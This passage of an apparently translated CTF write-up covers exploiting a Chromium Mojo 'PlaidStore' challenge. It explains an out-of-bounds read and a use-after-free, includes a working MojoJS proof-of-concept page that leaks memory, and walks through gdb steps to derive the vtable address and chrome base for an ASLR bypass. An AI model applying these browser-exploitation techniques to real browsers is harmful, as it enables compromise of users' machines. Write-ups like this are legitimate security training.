class="line">        &#123;</span><br><span class="line">            std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="function">std::vector&lt;<span class="type">uint8_t</span>&gt; <span class="title">result</span><span class="params">(it-&gt;second.begin(), it-&gt;second.begin() + count)</span></span>;</span><br><span class="line">        std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(result);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// static</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">        mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        mojo::<span class="built_in">MakeSelfOwnedReceiver</span>(std::<span class="built_in">make_unique</span>&lt;PlaidStoreImpl&gt;(render_frame_host),</span><br><span class="line">                                    std::<span class="built_in">move</span>(receiver));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125; <span class="comment">// namespace content</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> content</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">class</span> 
<span class="title class_">RenderFrameHost</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">class</span> <span class="title class_">PlaidStoreImpl</span> : <span class="keyword">public</span> blink::mojom::PlaidStore</span><br><span class="line">    &#123;</span><br><span class="line">    <span class="keyword">public</span>:</span><br><span class="line">        <span class="function"><span class="keyword">explicit</span> <span class="title">PlaidStoreImpl</span><span class="params">(RenderFrameHost *render_frame_host)</span></span>;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">            mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span>;</span><br><span class="line"></span><br><span class="line">        ~<span class="built_in">PlaidStoreImpl</span>() <span class="keyword">override</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// PlaidStore overrides:</span></span><br><span class="line">        <span class="function"><span class="type">void</span> <span class="title">StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span> <span class="keyword">override</span></span>;</span><br><span class="line"></span><br><span class="line">        
<span class="function"><span class="type">void</span> <span class="title">GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">            GetDataCallback callback)</span> <span class="keyword">override</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span>:</span><br><span class="line">        <span class="comment">// Note the raw pointer `render_frame_host_` here</span></span><br><span class="line">        RenderFrameHost *render_frame_host_;</span><br><span class="line">        std::map&lt;std::string, std::vector&lt;<span class="type">uint8_t</span>&gt;&gt; data_store_;</span><br><span class="line">  &#125;;</span><br><span class="line">&#125; <span class="comment">// namespace content</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="b-OOB漏洞">b. 
OOB vulnerability</h3><blockquote><p>OOB (Out Of Bounds) refers to <strong>out-of-bounds memory access</strong>, that is, reading or writing past the end of a buffer. The bug here is an out-of-bounds read.</p></blockquote><p>In <code>PlaidStoreImpl::GetData</code>, the caller-supplied <code>count</code> is never checked against the size of the stored vector, so the function can read past the end of the buffer and return more data than was actually stored.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">      GetDataCallback callback)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    
&#125;</span><br><span class="line">    <span class="keyword">auto</span> it = data_store_.<span class="built_in">find</span>(key);</span><br><span class="line">    <span class="keyword">if</span> (it == data_store_.<span class="built_in">end</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// count is used as the read length with no bounds check: count bytes are returned starting at begin()</span></span><br><span class="line">    <span class="function">std::vector&lt;<span class="type">uint8_t</span>&gt; <span class="title">result</span><span class="params">(it-&gt;second.begin(), it-&gt;second.begin() + count)</span></span>;</span><br><span class="line">    std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(result);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="c-UAF漏洞">c. 
UAF vulnerability</h3><ul><li><p>When the <code>PlaidStoreImpl</code> constructor runs, the new instance <strong>stores</strong> the <code>render_frame_host</code> it is given as a <strong>raw pointer</strong>. (Note that it keeps a <strong>raw</strong> pointer, <strong>not a smart pointer</strong>.)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PlaidStoreImpl::<span class="built_in">PlaidStoreImpl</span>(</span><br><span class="line">        RenderFrameHost *render_frame_host)</span><br><span class="line">        : <span class="built_in">render_frame_host_</span>(render_frame_host) &#123;&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>PlaidStoreImpl::Create</code> calls <code>mojo::MakeSelfOwnedReceiver</code>, which binds the <code>Receiver</code> end of the Mojo pipe to the new <code>PlaidStoreImpl</code> instance (note that <strong>the <code>unique</code> smart pointer passed in owns the <code>PlaidStoreImpl</code></strong>, not the <code>render_frame_host</code>). When the Mojo pipe is closed or hits an error, the <code>receiver</code> destroys the <code>PlaidStoreImpl</code> instance. This ties the lifetime of <code>PlaidStoreImpl</code> to the pipe.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// static</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span 
class="function"></span>&#123;</span><br><span class="line">    mojo::<span class="built_in">MakeSelfOwnedReceiver</span>(std::<span class="built_in">make_unique</span>&lt;PlaidStoreImpl&gt;(render_frame_host),</span><br><span class="line">                                std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>However, the lifetime of <code>render_frame_host</code> is not tied to the <code>PlaidStoreImpl</code> instance. If the <code>render_frame_host</code> is destroyed, the <code>PlaidStoreImpl</code> instance lives on and keeps a dangling pointer to it.</p><blockquote><p>Each <code>RenderFrame</code> in a <code>renderer</code> process corresponds to a <code>RenderFrameHost</code> in the <code>browser</code> process.</p><p>When a new tab or iframe is opened, the <code>browser</code> creates the corresponding <code>RenderFrameHost</code> object.</p><p>The same holds for destruction: <strong>when a tab or iframe is destroyed, the corresponding <code>RenderFrameHost</code> object is freed</strong>.</p><p>Reference: <a href="https://blog.csdn.net/luoshengyang/article/details/50450100?biz_id=102&amp;utm_term=renderFrameHost&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-50450100&amp;spm=1018.2118.3001.4187">Chromium网页Frame Tree创建过程分析</a></p></blockquote><p>So if we keep the <code>Mojo Pipe</code> open while getting the <code>render_frame_host</code> destroyed, the <code>PlaidStoreImpl</code> methods will keep using the freed <code>render_frame_host</code>, which gives us the UAF.</p><blockquote><p>Summary:</p><ol><li><p>If the Mojo pipe is closed, the <code>PlaidStoreImpl</code> instance is destroyed;</p></li><li><p>If the <code>render_frame_host</code> is destroyed, the corresponding <code>PlaidStoreImpl</code> instance still exists.</p></li></ol></blockquote></li></ul><h2 id="5-调试与利用过程">5. Debugging and exploitation</h2><h3 id="a-OOB">a. 
OOB</h3><ul><li><p>Let's first write an OOB PoC and see what information it leaks.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- These JS files must be included in the html in order to call the MojoJS interfaces --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span 
class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">bytes2DWORD</span>(<span class="params">bytes</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> value = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            value = value * <span class="number">0x100</span> + bytes[<span class="number">7</span> - i];</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span 
class="language-javascript">        <span class="keyword">return</span> value;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">success</span>(<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + msg);</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">document</span>.<span class="property">body</span>.<span class="property">innerText</span> += <span class="string">&#x27;[+] &#x27;</span> + msg + <span class="string">&#x27;\n&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// OOB vulnerability test</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">oob</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;OOB&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// Get a plaidStore instance</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> plaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript">    
    <span class="comment">// Bind the plaidStore instance to a mojo pipe</span></span></span><br><span class="line"><span class="language-javascript">        <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">            blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,            <span class="comment">// interfaceName</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// Create the mojo pipe and return its handle</span></span></span><br><span class="line"><span class="language-javascript">            mojo.<span class="title function_">makeRequest</span>(plaidStorePtr).<span class="property">handle</span>, <span class="comment">// request_handle</span></span></span><br><span class="line"><span class="language-javascript">            <span class="string">&quot;context&quot;</span>,                              <span class="comment">// scope</span></span></span><br><span class="line"><span class="language-javascript">            <span class="literal">true</span>);                                  <span class="comment">// useBrowserInterfaceBroker</span></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// plaidStore stores uint8 values. Here we store 0x10 elements</span></span></span><br><span class="line"><span class="language-javascript">        plaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;aaaa&quot;</span>, [<span class="number">0x31</span>, <span class="number">0x32</span>, <span class="number">0x33</span>, <span class="number">0x34</span>, <span class="number">0x35</span>, <span class="number">0x36</span>, <span class="number">0x37</span>, <span class="number">0x38</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x41</span>, <span 
class="number">0x42</span>, <span class="number">0x43</span>, <span class="number">0x44</span>, <span class="number">0x45</span>, <span class="number">0x46</span>, <span class="number">0x47</span>, <span class="number">0x48</span>]);</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// getData returns a Promise; the result is read in the then() callback</span></span></span><br><span class="line"><span class="language-javascript">        plaidStorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x18</span>).<span class="title function_">then</span>(<span class="function"><span class="params">res</span> =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// The returned array elements are uint8 values</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// slice(0x10, 0x18) takes the 8 bytes just past the 0x10 bytes we stored</span></span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">success</span>(<span class="title function_">dec2hex</span>(<span class="title function_">bytes2DWORD</span>(res.<span class="property">data</span>.<span class="title function_">slice</span>(<span class="number">0x10</span>, <span class="number">0x18</span>))));</span></span><br><span class="line"><span class="language-javascript">        &#125;)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">oob</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span 
class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></li><li><p>After starting the debugger, first set a breakpoint on <code>PlaidStoreImpl::Create</code>.</p><p><img src="/2020/10/mojo/breakCreate.png" alt="img"></p><p>Then execute <code>run</code>, which stops inside <code>PlaidStoreImpl::Create</code>. Here we can see that <code>PlaidStoreImpl</code> is 0x28 bytes in size.</p><p><img src="/2020/10/mojo/sizeofPlaidStore.png" alt="img"></p><blockquote><p>Why is <code>sizeof(PlaidStoreImpl) == 0x28</code>? Because the next function to be called is <code>operator new</code>, and <code>0x28</code> is the allocation size passed to it.</p><p>How do we know that the function at <code>0x555xxxxx</code> is <code>operator new</code>? Step into it, then run the <code>frame</code> command, or run <code>bt</code> to print the call stack. The first function listed is the one.</p><p><img src="/2020/10/mojo/operatorNew.png" alt="img"></p><p>Another simple way is to use the <code>c++filt</code> command, which restores a function name that went through <code>name mangling</code> to its original form.</p><p><img src="/2020/10/mojo/cppfilt.png" alt="img"></p></blockquote><p>Once <code>operator new</code> returns, the address in <code>%rax</code> is the address of the <code>PlaidStoreImpl</code>. Use the gdb command <code>set $ps_addr = $rax</code> to save that address in a gdb convenience variable. Then run <code>finish</code> to run through the rest of the function, which constructs the <code>PlaidStoreImpl</code> instance (this includes, among other things, <strong>setting the vtable pointer</strong>).</p><p><img src="/2020/10/mojo/storePsAddr.png" alt="img"></p></li><li><p>After the <code>fini</code> command, let's look at the memory layout of the <code>PlaidStoreImpl</code> instance (the relevant members are annotated in the image).</p><p><img src="/2020/10/mojo/plaidStoreImplMap.png" alt="img"></p><blockquote><p>Compilers that follow the Itanium C++ ABI, as is the case on Linux, place the vtable pointer at the <strong>very start</strong> of the object.</p></blockquote></li><li><p>Let's look at how <code>map</code> is laid out in memory to see exactly which address gets leaked - <a href="https://source.chromium.org/chromium/chromium/src/+/master:buildtools/third_party/libc++/trunk/include/map;l=898;drc=ce29422a5a0922393f61efe899ec80e9894e09ed;bpv=0;bpt=1">chrome std::map source</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">_LIBCPP_TEMPLATE_VIS</span> map</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">typedef</span> __tree&lt;__value_type, __vc, __allocator_type&gt;   __base;</span><br><span class="line">    __base __tree_;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As is well known, map is implemented with an <code>rb_tree</code> (red-black tree), so let's dig one level deeper - <a href="https://source.chromium.org/chromium/chromium/src/+/master:buildtools/third_party/libc++/trunk/include/__tree;drc=ce29422a5a0922393f61efe899ec80e9894e09ed;bpv=0;bpt=1;l=979">chrome std::tree source</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Tp</span>, <span class="keyword">class</span> <span class="title 
class_">_Compare</span>, <span class="keyword">class</span> <span class="title class_">_Allocator</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> _Tp                                      value_type;</span><br><span class="line">    <span class="keyword">typedef</span> _Compare                                 value_compare;</span><br><span class="line">    <span class="keyword">typedef</span> _Allocator                               allocator_type;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="keyword">typedef</span> allocator_traits&lt;allocator_type&gt;         __alloc_traits;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> __make_tree_node_types&lt;value_type,</span><br><span class="line">        <span class="keyword">typename</span> __alloc_traits::void_pointer&gt;::type</span><br><span class="line">                                                    _NodeTypes;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeTypes::__parent_pointer      __parent_pointer;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeTypes::__iter_pointer        __iter_pointer;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    __iter_pointer                                     __begin_node_;</span><br><span class="line">    __compressed_pair&lt;<span class="type">__end_node_t</span>, __node_allocator&gt;  __pair1_;</span><br><span class="line">    
__compressed_pair&lt;size_type, value_compare&gt;        __pair3_;</span><br><span class="line">    <span class="comment">// ...</span></span><br></pre></td></tr></table></figure><p>As we can see, the tree has three member variables. The first pointer, <code>__begin_node_</code>, points to the leftmost node, which is also the root while the tree holds only one element. The number of tree member variables also matches the <code>PlaidStoreImpl</code> memory layout.</p></li><li><p>Next, let's see which <strong>member variables the node</strong> pointed to by the tree's first pointer has - <a href="https://source.chromium.org/chromium/chromium/src/+/master:buildtools/third_party/libc++/trunk/include/__tree;drc=ce29422a5a0922393f61efe899ec80e9894e09ed;l=751">chrome tree_node source</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title 
class_">_Pointer</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree_end_node</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> _Pointer pointer;</span><br><span class="line">    pointer __left_;</span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_VoidPtr</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree_node_base</span></span><br><span class="line">    : <span class="keyword">public</span> __tree_node_base_types&lt;_VoidPtr&gt;::__end_node_type</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeBaseTypes::__node_base_pointer pointer;</span><br><span class="line">    <span class="keyword">typedef</span> <span class="keyword">typename</span> _NodeBaseTypes::__parent_pointer __parent_pointer;</span><br><span class="line"></span><br><span class="line">    pointer          __right_;</span><br><span class="line">    __parent_pointer __parent_;</span><br><span class="line">    <span class="type">bool</span> __is_black_;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">   <span class="comment">// ...</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span 
class="title class_">_Tp</span>, <span class="keyword">class</span> <span class="title class_">_VoidPtr</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree_node</span></span><br><span class="line">    : <span class="keyword">public</span> __tree_node_base&lt;_VoidPtr&gt;</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    <span class="keyword">typedef</span> _Tp __node_value_type;</span><br><span class="line">    __node_value_type __value_;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>That is, a <code>__tree_node</code> instance has the following five members:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pointer             __left_;</span><br><span class="line">pointer             __right_;</span><br><span class="line">__parent_pointer    __parent_;</span><br><span class="line"><span class="type">bool</span>                __is_black_;</span><br><span class="line">__node_value_type   __value_;   <span class="comment">// here `__node_value_type` is `pair&lt;string, vector&lt;uint8_t&gt;&gt;`</span></span><br></pre></td></tr></table></figure><p>Finally, let us look at the memory layout of <code>__tree_node</code>.</p><blockquote><p>Before inspecting the memory layout, let chrome finish executing <code>PlaidStoreImpl::storeData</code> so that the data is stored in the tree, which makes debugging easier.</p></blockquote><p><img src="/2020/10/mojo/treeNodeMap.png" 
alt="img"></p><blockquote><p>The 0x30 bytes in the red box in the figure are the <code>__value_</code> member. The first 0x18 bytes are the <code>string</code> instance (note the <code>0x0000000061616161</code>, which is exactly the keyString <code>aaaa</code> that we passed in), and the last 0x18 bytes are the <code>vector</code> instance.</p></blockquote></li><li><p>The member variables of <code>vector</code> are shown below. The class has three members; here we only care about the memory that <code>__begin_</code> points to. (The excerpt shown is the <code>vector&lt;bool&gt;</code> specialization; the generic <code>vector&lt;uint8_t&gt;</code> used by this challenge likewise holds three pointer-sized members, the first of which is <code>__begin_</code>.)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Allocator</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">_LIBCPP_TEMPLATE_VIS</span> vector&lt;<span class="type">bool</span>, _Allocator&gt;</span><br><span class="line">    : <span class="keyword">private</span> __vector_base_common&lt;<span class="literal">true</span>&gt;</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">    __storage_pointer                                      __begin_;</span><br><span class="line">    size_type                                              __size_;</span><br><span class="line">    __compressed_pair&lt;size_type, __storage_allocator&gt; __cap_alloc_;</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure><p>Below is the memory that the vector points to. The first 0x10 bytes hold the values written earlier by <code>PlaidStore::storeData</code>, and we can read out of bounds past the end of this <code>vector</code>.</p><p><img src="/2020/10/mojo/vectorMap.png" 
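alt="img"></p></li></ul><blockquote><p>Why go to such lengths, tracing from the top down to find the address that the <code>vector</code> leaks from? Because we need to find out <strong>whether this address is related to other addresses we have already obtained</strong>.</p><p>In this challenge, we can confirm that <code>vector __begin_</code> and the <code>PlaidStoreImpl</code> address lie in the same memory region.</p></blockquote><ul><li><p>So what should we read out of bounds, and what information should we leak?</p><p>The <code>PlaidStore</code> instance and the address that <code>vector __begin_</code> points to are <strong>in the same memory region</strong>, and the <code>PlaidStore</code> instance holds a vtable pointer, so we can use the <code>vector</code> to read the <code>PlaidStore vtable</code> address out of bounds. From the vtable address we can then derive a series of other addresses (including, but not limited to, the ELF base address).</p><blockquote><p>The vtable of a class lives in the <code>rodata</code> section, which means the offset between the <code>vtable</code> address and the <strong>ELF base address</strong> is constant.</p></blockquote><p><img src="/2020/10/mojo/vmmap.png" alt="img"></p><p>We need to allocate a large number of <code>PlaidStoreImpl</code> objects and <code>vector</code>s so that they end up interleaved linearly in memory; after that we can <strong>obtain the vtable address</strong> with an out-of-bounds read.</p><blockquote><p>Note the last three hex digits of the vtable address, <code>0x7a0</code>. We use them to recognize whether a value we read is the vtable address, instead of reading at a fixed offset. Because the binary is mapped page-aligned, these low 12 bits stay the same under ASLR, and matching on them avoids, as far as possible, <strong>offset differences caused by different allocator behavior</strong>.</p></blockquote><p>The offset between the vtable and the chrome base address is <code>0x000055555f50a7a0 - 0x555555554000 == 0x9fb67a0</code>, so once we have the vtable address we can compute the ELF base address from this offset.</p><p><img src="/2020/10/mojo/chromeBaseOffset.png" alt="img"></p><p>With the ELF base address in hand, we can use the following command to obtain a set of <code>gadgets</code> addresses.</p><figure class="highlight sh"><table><tr><td 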